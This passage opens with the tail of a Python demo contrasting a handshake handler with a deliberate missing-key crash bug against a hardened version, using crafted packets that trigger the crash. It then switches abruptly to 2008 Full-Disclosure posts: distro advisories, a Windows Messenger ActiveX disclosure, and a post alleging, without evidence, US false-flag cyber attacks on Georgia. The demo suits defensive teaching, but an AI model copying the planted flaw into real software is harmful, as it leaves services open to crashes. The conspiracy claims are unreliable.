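            return "error: Incompatible version"   # key stays None
        s.key = os.urandom(16)
        return "hello-ok"
    return xor_decrypt(s.key, packet["data"])      # None key -> crash


def handle_hardened(s: Session, packet: dict):
    """A failed handshake closes the session; decryption is reachable only
    with a key in place."""
    if s.state == "closed":
        return "dropped"
    if s.state == "await_hello":
        if packet.get("type") != 0:
            s.state = "closed"
            return "dropped"
        if packet.get("version") != SERVER_VERSION:
            s.state = "closed"
            return "error: Incompatible version"
        s.key = os.urandom(16)
        s.state = "established"
        return "hello-ok"
    if s.key is None:            # defence in depth: never decrypt keyless
        s.state = "closed"
        return "dropped"
    return xor_decrypt(s.key, packet.get("data", b""))


def run(handler, packets):
    """Feed packets to one fresh session; a crash is recorded, not raised."""
    session, replies = Session(), []
    for packet in packets:
        try:
            replies.append(handler(session, packet))
        except TypeError:        # analogue of the NULL pointer exception
            replies.append("CRASH")
            break
    return replies


# Constructed packets: a hello with the wrong version, a valid hello, data.
BAD_HELLO = {"type": 0, "version": "0.0.0"}
GOOD_HELLO = {"type": 0, "version": SERVER_VERSION}
DATA = {"type": 1, "data": b"\x01\x02\x03"}

if __name__ == "__main__":
    print("vulnerable:", run(handle_vulnerable, [BAD_HELLO, DATA]))
    print("hardened:  ", run(handle_hardened, [BAD_HELLO, DATA]))
```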



[Full-disclosure] rPSA-2008-0243-1 idle python

2008-08-13 Thread rPath Update Announcements
rPath Security Advisory: 2008-0243-1
Published: 2008-08-13
Products:
rPath Appliance Platform Linux Service 1
rPath Appliance Platform Linux Service 2
rPath Linux 1
rPath Linux 2

Rating: Major
Exposure Level Classification:
Indirect Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/2.4.1-20.17-1
[EMAIL PROTECTED]:2/2.4.4-41-0.1
[EMAIL PROTECTED]:1/2.4.1-20.17-1
[EMAIL PROTECTED]:2/2.4.4-41-0.1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1412
https://issues.rpath.com/browse/RPL-2648

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2316
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144

Description:
Previous versions of the python package are vulnerable to multiple
attacks, the most serious of which may allow an attacker to execute
arbitrary code.

Additionally, previous versions of the python package on rPath Linux 2
and rPath Appliance Platform Linux Service 2 did not provide the bsddb
module.  This has been corrected.

http://wiki.rpath.com/Advisories:rPSA-2008-0243

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



Re: [Full-disclosure] Internet attacks against Georgian web sites

2008-08-13 Thread n3td3v
On Wed, Aug 13, 2008 at 7:35 PM, Jim Race <[EMAIL PROTECTED]> wrote:
> http://www.nextgov.com/nextgov/ng_20080812_7995.php
>

"We want to get the attention of the next administration as they are
coming in" --Marcus Sachs.

Announcing this during the Georgia cyber attacks is well and truly calculated.

It draws attention to U.S cyber ambitions while the Georgia cyber
attacks are happening, which makes my theory that the Georgia cyber
attacks are U.S false flags even stronger.

How else could U.S get the cyber command and U.S cyber ambitions in
the media at exactly the same time as the Georgia cyber attacks, but
to make up a story that the big U.S cyber command is shelved.

Pentagon puts hold on USAF cyber effort
http://ap.google.com/article/ALeqM5gCRZYKAcPy9kLZ4G3YvS-aMu2RrwD92HJ5VO2

They've done the false flag cyber attacks in Georgia, and now they are
playing the media by keeping the ambitions of a big U.S cyber command
front focus just at the right time.

All the best,

n3td3v

-- Forwarded message --
From: n3td3v <[EMAIL PROTECTED]>
Date: Wed, Aug 13, 2008 at 5:49 PM
Subject: Re: [Full-disclosure] Internet attacks against Georgian web sites
To: full-disclosure@lists.grok.org.uk


Watch this video by Marcus Sachs at Black Hat 2008
http://www.youtube.com/watch?v=FSUPTZVlkyU, he talks about, how are we
going to get the next president's attention in the transition period
in the first 100 days of Obama or McCain getting into the White House
and to take "cyber" seriously?

Now by this video it seems that Marcus Sachs
http://en.wikipedia.org/wiki/Marcus_Sachs is trying to say we need a
cyber false flag attack in the first 100 days that Obama or McCain get
into the White House to make sure "cyber" is fully funded and that
cyber offensive operations are fully OK'd for the next four to eight
years.

"We want to get the attention of the next administration as they are
coming in" --Marcus Sachs.

He talks about the first two months or 100 days of the next presidency
is crucial in getting the attention of the president and its
administration.

Is this a hidden message here by Marcus Sachs about a Die Hard 4.0
scenario false flag attack being planned?

He said also in the video, when Bush was coming in, the powers that be
got their attention with 9/11 and that "cyber" got distracted, and now
he is basically saying when Obama or McCain come in that the U.S
government underworld are planning a cyber 9/11.

It seems that Marcus Sachs is frustrated that 9/11 got all the
attention last time, and now the powers that be are going to make sure
"cyber" takes up the main agenda this time around.

How are they going to get the attention of the next presidency to get
"cyber" fully funded and taken seriously is anyone's guess, but I fear
the worst and that we must keep our eyes and ears open for any false
flagging and other suspicious looking cyber security incidents, so we
are better prepared to call out "false flag" at the earliest
opportunity.

All the best,

n3td3v



[Full-disclosure] [ MDVSA-2008:169 ] hplip

2008-08-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:169
 http://www.mandriva.com/security/
 ___

 Package : hplip
 Date: August 13, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 4.0
 ___

 Problem Description:

 Marc Schoenefeld of the Red Hat Security Response Team discovered a
 vulnerability in the hplip alert-mailing functionality that could allow
 a local attacker to elevate their privileges by using specially-crafted
 packets to trigger alert mails that are sent by the root account
 (CVE-2008-2940).
 
 Another vulnerability was discovered by Marc Schoenefeld in the hpssd
 message parser that could allow a local attacker to stop the hpssd
 process by sending specially-crafted packets, causing a denial of
 service (CVE-2008-2941).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2940
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2941
 ___

 Updated Packages:


[Full-disclosure] Microsoft Windows Messenger Remote Illegal Access Vulnerability

2008-08-13 Thread cocoruder
Microsoft Windows Messenger Remote Illegal Access Vulnerability

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

A remote illegal access vulnerability exists in Microsoft Windows
Live Messenger. A vicious attacker can control the Live Messenger via
constructing a malicious web page, once the victim visits this page,
the attacker can control the local Live Messenger, including
disclosing personal sensitive information of Live Messenger,
transferring local audio and video information to remote and so on.


Affected Software Versions:

Microsoft Windows Live Messenger 4.7 on Windows XP and Windows Server 2003
Microsoft Windows Live Messenger 5.1 on Windows 2000, Windows XP
and Windows Server 2003



Details:

When installing Windows XP, an old edition of MSN Messenger is
installed automatically. The old edition opens the MSN API to develop
as an ActiveX Control, and marks it with "safe".

By using this ActiveX Control, we can control the local MSN
Messenger, for instance: change state, gain current login ID, steal
contact-person's information, send mail using the victim's name, and
so on, all of these functions given by this feature can be considered
to be security problems.

Even if the user installs a higher edition of MSN Messenger (Windows
Live Messenger), this ActiveX control will not be removed. By using
this we will still be allowed to visit the local Live Messenger.



Solution:

Microsoft has released an advisory for this vulnerability which
can be found at:

http://www.microsoft.com/technet/security/bulletin/ms08-050.mspx



CVE Information:

CVE-2008-0082



Disclosure Timeline:

2007.05.31  Vendor notified
2007.05.31  Vendor responded
2008.XX.XX  Advisory delayed by the vendor many times
2008.08.12  Coordinated public disclosure



--EOF--



[Full-disclosure] [ MDVSA-2008:168 ] stunnel

2008-08-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:168
 http://www.mandriva.com/security/
 ___

 Package : stunnel
 Date: August 13, 2008
 Affected: 2007.1, 2008.0, 2008.1
 ___

 Problem Description:

 A vulnerability was found in the OCSP search functionality in stunnel
 that could allow a remote attacker to use a revoked certificate that
 would be successfully authenticated by stunnel (CVE-2008-2420).
 This flaw only concerns users who have enabled OCSP validation
 in stunnel.
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2420
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIo4ZYmqjQ0CJFipgRAlJcAJ9SxbqPWr7rFfXOQrvunstzD6CaDQCcDFVV
gu0oRt+IXZm2jrzLl95gwaQ=
=rbeI
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2008:170 ] cups

2008-08-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:170
 http://www.mandriva.com/security/
 ___

 Package : cups
 Date: August 13, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___

 Problem Description:

 Thomas Pollet discovered an integer overflow vulnerability in the PNG
 image handling filter in CUPS.  This could allow a malicious user to
 execute arbitrary code with the privileges of the user running CUPS,
 or cause a denial of service by sending a specially crafted PNG image
 to the print server (CVE-2008-1722).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1722
 ___

 Updated Packages:
